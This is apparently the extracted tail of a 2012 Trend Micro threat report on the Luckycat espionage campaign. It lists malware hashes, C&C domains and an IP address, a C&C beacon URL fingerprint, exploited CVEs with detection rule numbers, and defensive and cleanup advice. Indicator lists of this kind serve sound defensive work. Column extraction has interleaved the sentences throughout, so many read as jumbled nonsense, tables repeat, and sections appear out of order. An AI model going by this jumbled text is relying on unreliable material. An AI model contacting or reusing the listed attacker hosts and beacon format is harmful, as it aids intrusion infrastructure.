applicable|liberate| MD5 CVE Identifier Campaign Code 24552d599b650ca3ecd467d9d740de33 _CVE-2010-3333_ liberate 6815ab1f11ac33d4c1149efc3206d794 Not applicable liberate 6bd4e7d7408e0d8d1592e27fc19650c8 Not applicable liberate _Table 9: Comfoo malware samples_ The samples in Table 9 connect to havefuns.rkntils.10dig.net or johnnees.rkntils.10dig.net, which both resolve to the same IP address—69.162.71.254. ----- #### CONCLUSION DEFENDING AGAINST APTS Targeted attacks have been extremely successful, Sufficiently motivated threat actors can penetrate making the scope of the problem truly global. These even networks that use moderately advanced security have been affecting governments, militaries, defense measures. As such, apart from standard and relevant industries, high-technology companies, intergovernmental attack prevention measures and mechanisms such as organizations, nongovernmental organizations (NGOs), solid patch management; endpoint and network security; media organizations, academic institutions, and activists firewall use; and the like, enterprises should also focus worldwide. on detecting and mitigating attacks. Moreover, data loss prevention (DLP) strategies such as identifying exactly Targeted attacks are not isolated smash-and-grab what an organization is protecting and taking into account incidents. They are part of consistent campaigns that the context of data use should be employed. aim to establish persistent, covert presence in a target’s network so that information can be extracted as needed. ##### Local and External Threat Intelligence Targeted attacks may not be easy to understand but careful monitoring allows researchers to leverage the Threat intelligence refers to indicators that can be used mistakes attackers make to get a glimpse inside their to identify the tools, tactics, and procedures threat actors operations. Moreover, we can track cyber-espionage engaging in targeted attacks utilize. Both external and campaigns over time using a combination of technical and local threat intelligence is crucial for developing the contextual indicators. ability to detect attacks early. The following are the core components of this defense strategy: This paper specifically discussed the Luckycat campaign. In the course of our research, we discovered that it had a - Enhanced visibility: Logs from endpoint, server, much more diverse target set than previously thought. Not and network monitoring are an important and often only did the attackers target military research institutions underused resource that can be aggregated to provide in India, as earlier disclosed by Symantec, they also a view of the activities within an organization that targeted sensitive entities in Japan and India as well as can be processed for anomalous behaviors that can Tibetan activists. They used a diversity of infrastructure indicate a targeted attack. as well, ranging from throw-away free-hosting sites to dedicated VPSs. - Integrity checks: In order to maintain persistence, malware will make modifications to the file system and We also found that the Luckycat campaign can be linked registry. Monitoring such changes can indicate the to other campaigns as well. The people behind it used or presence of malware. provided infrastructure for other campaigns that have also been linked to past targeted attacks such as the previously - Empowering the human analyst: Humans are best documented ShadowNet campaign.[19] positioned to identify anomalous behaviors when presented with a view of aggregated logs from across Understanding the attack tools, techniques, and a network. This information is used in conjunction with infrastructure used in the Luckycat campaign as well as custom alerts based on the local and external threat how an individual incident is related to a broader campaign intelligence available. provides the context necessary for us to assess its impact and come up with defensive strategies in order to protect our customers. ----- Technologies available today such as Deep Discovery ##### Educating Employees Against Social provide visibility, insight, and control over networks to ##### Engineering defend against targeted threats.[20] _Deep Discovery uniquely_ detects and identifies evasive threats in real time and provides in-depth analysis and actionable intelligence to Security-related policies and procedures combined with prevent, discover, and reduce risks. education and training programs are essential components of defense. Traditional training methods can be fortified ##### Mitigation and Cleanup Strategy by simulations and exercises using real spear-phishing attempts sent to test employees. Employees trained to expect targeted attacks are better positioned to report Once an attack is identified, the cleanup strategy should potential threats and constitute an important source of focus on the following objectives: threat intelligence. - Determine the attack vector and cut off ##### Data-Centric Protection Strategy communications with the C&C server. - Determine the scope of the compromise. The ultimate objective of targeted attacks is to acquire sensitive data. As such, DLP strategies that focus on - Assess the damage by analyzing the data and forensic identifying and protecting confidential information are artifacts available on compromised machines. critical. Enhanced data protection and visibility across an enterprise provides the ability to control access to Remediation should be applied soon afterward, which sensitive data as well as monitor and log successful and includes steps to fortify affected servers, machines, or unsuccessful attempts to access it. Enhanced access devices into secure states, informed in part by how the control and logging capabilities allow security analysts to compromised machines were infiltrated. locate and investigate anomalies, respond to incidents, and initiate remediation strategies and damage assessment. ----- |Attack Component|Protection Technology|Trend Micro Solution| |---|---|---| |HTTP C&C communication fingerprint count.php?m=c&n=[HOSTNAME]_[MAC_ ADDRESS]_[CAMPAIGN_CODE]@|Web Reputation|Endpoint (Titanium, Worry-Free Business Security, OfficeScan) Server (Deep Security) Messaging (InterScan Messaging Security, ScanMail Suite for Microsoft Exchange) Network (Deep Discovery) Gateway (InterScan Web Security, InterScan Messaging Security) Mobile (Mobile Security)| |TROJ_WIMMIE VBS_WIMMIE|File Reputation (Antivirus/Anti-malware)|Endpoint (Titanium, Worry-Free Business Security, OfficeScan) Server (Deep Security) Messaging (InterScan Messaging Security, ScanMail Suite for Microsoft Exchange) Network (Deep Discovery) Gateway (InterScan Web Security, InterScan Messaging Security) Mobile (Mobile Security)| #### TREND MICRO THREAT PROTECTION AGAINST LUCKYCAT CAMPAIGN COMPONENTS The following table summarizes the Trend Micro solutions for the components of the Luckycat campaign. Trend Micro recommends a comprehensive security risk management strategy that goes further than advanced protection to meet the real-time threat management requirements of dealing with targeted attacks. Attack Component Protection Technology Trend Micro Solution HTTP C&C communication fingerprint Web Reputation Endpoint (Titanium, Worry-Free Business _count.php?m=c&n=[HOSTNAME]_[MAC__ _Security, OfficeScan)_ _ADDRESS]_[CAMPAIGN_CODE]@_ Server (Deep Security) Messaging (InterScan Messaging Security, _ScanMail Suite for Microsoft Exchange)_ Network (Deep Discovery) Gateway (InterScan Web Security, _InterScan Messaging Security)_ Mobile (Mobile Security) TROJ_WIMMIE File Reputation Endpoint (Titanium, Worry-Free Business VBS_WIMMIE (Antivirus/Anti-malware) _Security, OfficeScan)_ Server (Deep Security) Messaging (InterScan Messaging Security, _ScanMail Suite for Microsoft Exchange)_ Network (Deep Discovery) Gateway (InterScan Web Security, _InterScan Messaging Security)_ Mobile (Mobile Security) ----- |Attack Component|Protection Technology|Trend Micro Solution| |---|---|---| |CVE-2010-3333 CVE-2010-2883 CVE-2010-3654 CVE-2011-0611 CVE-2011-2462|Vulnerability Shielding/Virtual Patching|Server (Deep Security) Endpoint (OfficeScan with Intrusion Defense Firewall Plug-In) For CVE-2010-3333: Rule #1004498 (Microsoft Word .RTF File Parsing Stack Buffer Overflow Vulnerability) For CVE-2010-2883: Rule #1004393 (Adobe Reader SING Table Parsing Vulnerability) Rule #1004113 (identified malicious .PDF file) Rule #1004315 (identified malicious .PDF file - 3) For CVE-2010-3654: Rule #1004497 (Adobe Flash Player Unspecified Code Execution Vulnerability) For CVE-2011-0611: Rule #1004801 (Adobe Flash Player .SWF File Remote Memory Corruption Vulnerability) Rule #1004114 (identified malicious .SWF file) Rule #1004647 (restrict Microsoft Office file with embedded .SWF file) For CVE-2011-2462: Rule #1004871 (Adobe Acrobat/ Reader U3D Component Memory Corruption Vulnerability) Rule #1004873 (Adobe Acrobat/ Reader U3D Component Memory Corruption)| Attack Component Protection Technology Trend Micro Solution _CVE-2010-3333_ Vulnerability Shielding/Virtual Patching Server (Deep Security) _CVE-2010-2883_ Endpoint (OfficeScan with Intrusion _CVE-2010-3654_ _Defense Firewall Plug-In)_ _CVE-2011-0611_ For CVE-2010-3333: _CVE-2011-2462_ Rule #1004498 (Microsoft Word _.RTF File Parsing Stack Buffer_ Overflow Vulnerability) For CVE-2010-2883: Rule #1004393 (Adobe Reader SING Table Parsing Vulnerability) Rule #1004113 (identified malicious .PDF file) Rule #1004315 (identified malicious .PDF file - 3) For CVE-2010-3654: Rule #1004497 (Adobe Flash _Player Unspecified Code Execution_ Vulnerability) For CVE-2011-0611: Rule #1004801 (Adobe Flash _Player .SWF File Remote Memory_ Corruption Vulnerability) Rule #1004114 (identified malicious .SWF file) Rule #1004647 (restrict Microsoft _Office file with embedded .SWF file)_ For CVE-2011-2462: Rule #1004871 (Adobe Acrobat/ _Reader U3D Component Memory_ Corruption Vulnerability) Rule #1004873 (Adobe Acrobat/ _Reader U3D Component Memory_ Corruption) ----- |Attack Component|Protection Technology|Trend Micro Solution| |---|---|---| |cattree.1x.biz charlesbrain.shop.co footballworldcup.website.org frankwhales.shop.co hi21222325.x.gg kinkeechow.shop.co kittyshop.kilu.org perfect.shop.co pumasports.website.org tomsburs.shop.co vpoasport.shopping2000.com goodwell.all.co.uk fireequipment.website.org tennissport.website.org waterpool.website.org tb123.xoomsite.com tbda123.gwchost.com toms.0fees.net tomygreen.0fees.net killmannets.0fees.net maritimemaster.kilu.org masterchoice.shop.co jeepvihecle.shop.co lucysmith.0fees.net|Web, Domain, and IP Reputation|Endpoint (Titanium, Worry-Free Business Security, OfficeScan) Server (Deep Security) Messaging (InterScan Messaging Security, ScanMail Suite for Microsoft Exchange) Network (Deep Discovery) Gateway (InterScan Web Security, InterScan Messaging Security) Mobile (Mobile Security)| Attack Component Protection Technology Trend Micro Solution _cattree.1x.biz_ Web, Domain, and IP Reputation Endpoint (Titanium, Worry-Free Business _charlesbrain.shop.co_ _Security, OfficeScan)_ _footballworldcup.website.org_ Server (Deep Security) _frankwhales.shop.co_ Messaging (InterScan Messaging Security, _hi21222325.x.gg_ _ScanMail Suite for Microsoft Exchange)_ _kinkeechow.shop.co_ Network (Deep Discovery) _kittyshop.kilu.org_ Gateway (InterScan Web Security, _perfect.shop.co_ _InterScan Messaging Security)_ _pumasports.website.org_ Mobile (Mobile Security) _tomsburs.shop.co_ _vpoasport.shopping2000.com_ _goodwell.all.co.uk_ _fireequipment.website.org_ _tennissport.website.org_ _waterpool.website.org_ _tb123.xoomsite.com_ _tbda123.gwchost.com_ _toms.0fees.net_ _tomygreen.0fees.net_ _killmannets.0fees.net_ _maritimemaster.kilu.org_ _masterchoice.shop.co_ _jeepvihecle.shop.co_ _lucysmith.0fees.net_ TREND MICRO™ TREND MICRO INC. Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global cloud security 10101 N. De Anza Blvd. leader, creates a world safe for exchanging digital information with its In­ Cupertino, CA 95014 ternet content security and threat management solutions for businesses and consumers. A pioneer in server security with over U.S. toll free: 1 +800.228.5651 20 years’ experience, we deliver top-ranked client, server and cloud- Phone: 1 +408.257.1500 based security that fits our customers’ and partners’ needs, stops Fax: 1 +408.257.2003 new threats faster, and protects data in physical, virtualized and cloud www.trendmicro.com environments. Powered by the industry-leading Trend Micro™ Smart Pro­ tection Network™ cloud computing security infrastructure, our products and services stop threats where they emerge—from the Internet. They are supported by 1,000+ threat intelligence experts around the globe. ©2012 by Trend Micro, Incorporated. All rights reserved. Trend Micro and the Trend Micro t-ball logo are trademarks or registered trademarks of Trend Micro, Incorporated. All other product or company ----- targeted nature of related components and techniques. Also, while cybercrime focuses on stealing credit card and banking information to gain profit, APTs are better thought of as cyber espionage. ## LUCKYCAT ### First Seen Individual targeted attacks are not one-off attempts. Attackers continually try to get inside the target’s network. The Luckycat campaign has been active since at least June 2011. ### Victims and Targets APT campaigns target specific industries or communities of interest in specific regions. The Luckycat campaign has been linked to 90 attacks against the following industries and/or communities in Japan and India: AEROSPACE ENERGY ENGINEERING SHIPPING MILITARY RESEARCH TIBETAN ACTIVISTS The threat actors behind the Luckycat campaign used a unique campaign code to track victims of specific attacks. ### Operations The 1st-stage computer intrusions often use social engineering. Attackers custom-fit attacks to their targets. »» Targeted emails that are contextually relevant (i.e., emails containing a decoy document of radiation dose measurement results sent some time after the Great East Japan Earthquake) »» Exploited CVE-2010-3333 (aka, Rich Text Format [RTF] Stack Buffer Overflow Vulnerability) in several instances, although Adobe _Reader and Flash Player vulnerabilities were also exploited_ »» Used TROJ_WIMMIE or VBS_WIMMIE—malware that take advantage of the Windows Management Instrumentation (WMI), making the backdoor component undetectable through file scanning »» The WIMMIE malware, once inside the network, connects to a command-and-control (C&C) server via HTTP over port 80 »» Attackers heavily used free web-hosting services to host their C&C servers under a diverse set of domain names but also used virtual private servers (VPSs) for more stable operations ### Possible Indicators of Compromise Attackers want to remain undetected as long as possible. A key characteristic of these attacks is stealth. WIMMIE malware do not leave much network fingerprint. However, the following is an identifiable HTTP C&C communication fingerprint—count.php?m=c&n=[HOSTNAME]_[MAC_ADDRESS]_[CAMPAIGN_CODE]@. This format can also be seen in the URL inside the script when /namespace:\\root\subscription path __eventconsumer is typed in the command line for WMI. ### Relationship with Other APT Campaigns -----